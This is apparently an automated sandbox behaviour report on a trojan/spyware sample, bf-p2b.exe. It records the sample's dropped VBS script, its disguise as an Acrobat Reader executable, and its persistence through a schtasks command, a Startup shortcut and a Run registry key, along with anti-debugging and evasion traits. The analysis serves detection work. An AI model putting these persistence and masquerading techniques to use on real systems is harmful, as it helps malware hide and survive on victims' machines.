                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Users\user\Desktop\bf-p2b.exeFile created: C:\Users\user\AppData\Roaming\WindataJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeFile created: C:\Users\user\AppData\Local\Temp\JWPING.vbsJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/3@0/1
                Source: C:\Users\user\Desktop\bf-p2b.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B4EA85
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4D712 GetLastError,FormatMessageW,0_2_00B4D712
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B46F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00B46F5B
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B031F2 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B031F2
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
                Source: bf-p2b.exeStatic file information: File size 1049600 > 1048576
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B5020C pushfd ; retf 0_2_00B50215
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6C6CC push esi; ret 0_2_00B6C6CE
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B27795 push ecx; ret 0_2_00B277A8
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4BB9D push FFFFFF8Bh; iretd 0_2_00B4BB9F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2CB5D push edi; ret 0_2_00B2CB5F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2CC76 push esi; ret 0_2_00B2CC78
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B08D99 push edi; retn 0000h0_2_00B08D9B
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2CE51 push esi; ret 0_2_00B2CE53
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2CF3A push edi; ret 0_2_00B2CF3C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B08F0E push F7FFFFFFh; retn 0000h0_2_00B08F13
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F2020C pushfd ; retf 5_2_00F20215
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF7795 push ecx; ret 5_2_00EF77A8
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1BB9D push FFFFFF8Bh; iretd 5_2_00F1BB9F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFCB5D push edi; ret 5_2_00EFCB5F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFCC76 push esi; ret 5_2_00EFCC78
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED8D99 push edi; retn 0000h5_2_00ED8D9B
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFCE51 push esi; ret 5_2_00EFCE53
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFCF3A push edi; ret 5_2_00EFCF3C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED8F0E push F7FFFFFFh; retn 0000h5_2_00ED8F13
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00C830E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00C830E0
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Users\user\Desktop\bf-p2b.exeFile created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: C:\Users\user\Desktop\bf-p2b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnkJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnkJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JWPINGJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JWPINGJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B1F78E
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B67F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B67F0E
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00EEF78E
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F37F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00F37F0E
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B21E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B21E5A
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exe TID: 7424Thread sleep time: -49760s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\bf-p2b.exeThread sleep count: Count: 4976 delay: -10Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: Yara matchFile source: 00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7492, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JWPING.vbs, type: DROPPED
                Source: C:\Users\user\Desktop\bf-p2b.exeWindow / User API: threadDelayed 4976Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeWindow / User API: foregroundWindowGot 1657Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeAPI coverage: 7.1 %
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B1E47B
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B1DD92
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B52044
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B5219F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F350
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B524A9
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00B46B3F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4FDD2
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4FD47 FindFirstFileW,FindClose,0_2_00B4FD47
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00B46E4A
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F22044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00F22044
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F2219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00F2219F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00F1F350
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F224A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00F224A9
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F16B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,5_2_00F16B3F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00F1FDD2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEDD92 GetFileAttributesW,FindFirstFileW,FindClose,5_2_00EEDD92
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1FD47 FindFirstFileW,FindClose,5_2_00F1FD47
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F16E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,5_2_00F16E4A
                Source: C:\Users\user\Desktop\bf-p2b.exeAPI call chain: ExitProcess graph end nodegraph_0-64819
                Source: C:\Users\user\Desktop\bf-p2b.exeAPI call chain: ExitProcess graph end nodegraph_0-63526
                Source: C:\Users\user\Desktop\bf-p2b.exeAPI call chain: ExitProcess graph end nodegraph_0-65163
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeAPI call chain: ExitProcess graph end node
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B0374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00B0374E
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00B346D0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00C830E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00C830E0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B3B398
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B5703C BlockInput,0_2_00B5703C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B28E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B28E3C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B28E19 SetUnhandledExceptionFilter,0_2_00B28E19
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00EF8E3C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF8E19 SetUnhandledExceptionFilter,5_2_00EF8E19
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winmgmts:\\localhost\root\securitycenter2`memstr_619244c2-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587780w246587805w246587806w246587807w246587798vmemstr_10b9c0ff-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587780w246587805w246587806w246587807w246587798amemstr_4d40c312-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587780w246587805w246587806w246587807w246587798pmemstr_e325349c-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {e09d739d-ccd4-44ee-8eba-3fbf8be4fc58}cmemstr_3aea81c0-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eh %ymemstr_8622a9be-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erroramemstr_4fada0c5-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eturnmemstr_e085261d-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: error ymemstr_ad8e34f2-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfi~memstr_4dee98f2-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: errorpc~memstr_e5727e1b-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;@0%ymemstr_e762c0a8-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k2wb0yw6wkmemstr_26a0261c-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\profapi.dllmemstr_cf3215ab-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonprogramfiles(x86)=c:\program files (x86)\common filesmemstr_d0c018aa-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\napinsp.dllmemstr_2ea1404a-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\pnrpnsp.dllmemstr_8d3e5249-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscmemstr_a85a3398-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.msc]memstr_b99a09de-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wshbth.dlljmemstr_538147e0-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userappdataqmemstr_020841dd-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k5uf7dj8xa0fnmemstr_7a127728-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\nlaapi.dllmemstr_5dfff347-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userappdatamemstr_1e65c4fa-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\amsi.dll&memstr_3a85d751-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trogram files\common filesmemstr_0ff42cc7-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2ck2ug8jy6ememstr_bd060bce-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2at9ow0nmemstr_dcf8a145-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\sspicli.dllmemstr_2d95faae-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k4kc1ih1my3tmemstr_2beb6522-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloadsmemstr_7ae76108-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\gameexplorermemstr_8f9f0cfb-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\downloadsmemstr_b190e142-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1eg5wd1gd.exememstr_0001f21b-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\musicvmemstr_476a5df9-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\roamingtilesomemstr_afa62ce5-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\start menudmemstr_2134b1f2-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\music\playlists}memstr_ef57ce36-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k9dr3ze8gxejmemstr_61733d55-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h8zd3lu4ks5wkmemstr_8e5a2d17-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\dllhost.exememstr_f5f63900-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\saved gamesmemstr_0eafadc6-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\inetcookies<memstr_62381900-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\recorded calls5memstr_a52d60c6-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,c:\users\user\appdataalls"memstr_4c2a8dc3-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ntshrui.dllmemstr_60aeff1d-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5go3zdmemstr_332e145c-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\start menumemstr_acb5368d-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\picturesmemstr_96087ae1-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\cscapi.dllmemstr_f2d858e9-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\documentsmemstr_397418cc-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documentsmemstr_97137ed2-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\3d objectsmemstr_e6a2d522-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\srvcli.dllmemstr_fdba81e1-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favoritesmemstr_5673d488-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uuinfdmemstr_7f3d7178-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [6x:~memstr_3249aab2-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\nlaapi.dllkmemstr_818d85f1-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int fd_count;uint fd_array[64]memstr_4e3f00e3-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [6(<~memstr_ca1e4e77-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\winrnr.dll'memstr_3b7d3c7c-4
